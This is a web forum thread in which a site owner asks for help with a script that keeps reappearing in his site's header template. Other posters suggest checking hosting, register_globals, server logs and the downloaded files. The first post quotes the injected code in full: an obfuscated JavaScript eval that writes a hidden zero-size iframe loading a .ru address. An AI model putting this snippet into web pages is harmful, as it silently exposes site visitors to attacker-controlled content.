Thread: Hacked?

I get his in my _header.html
I can remove it but it coming back. Do someone now how I permanent remove it?

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function( c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6.7(\'<1 5="4://2.3.8/c/9.f?e" d="0" a="0" b="0"></1>\');',16,16,'|iframe|ad|1gb|http|src|document|wr ite|ru|in|height|frameborder|script|width|default| cgi'.split('|'),0,{}));</script>

Anyone have a idea?

Originally Posted by Knuty

Anyone have a idea?

You have had problems like this for a long time.... and I have mentioned many times that your hosting maybe substandard or insecure.

I would really recommend you take a close look at your host, and your script configuration (permissions and so on).

Also, any modifications you have added to the code.

Warm regards,
Smoge

Well, I do not have this problem for a long time and you never tild me anything so I maybe think you take for an other user

My host have search the servere and found nothing. I have chaecked permissions and find it ok.

Originally Posted by Knuty

Well, I do not have this problem for a long time and you never tild me anything so I maybe think you take for an other user

Maybe... ha ha

My host have search the servere and found nothing. I have chaecked permissions and find it ok.

and register_globals is ON or OFF?

Smoge

Originally Posted by Smoge

Maybe... ha ha



and register_globals is ON or OFF?

Smoge

OFF for years

Then next step - check your apache logs for suspicious entries...

Download your site, and search it for malicious code...

Detective time... but you need data .... so use the available data (logs) you have to see what has been happening with your site.

You can view it as a challenge, or as a annoyance - but if you view it as a challenge, it can be more fun.

Warm regards,
Smoge

To start, check or ask your host, is "register_globals" on in your hosting... it should be OFF. That is step one.

Smoge

Hello Smoge:

register_globals is OFF.

We have downloaded our site and we have verified that does not contain virus.

We have checked with Drweb and all index.html contains some javascript code obfuscated to link to www.hertybaxy.com (Warning: maliciosus site).

Al files affected has write protection.

At this time the site was fixed an runing Ok but we are not sure that have this problem in the future again.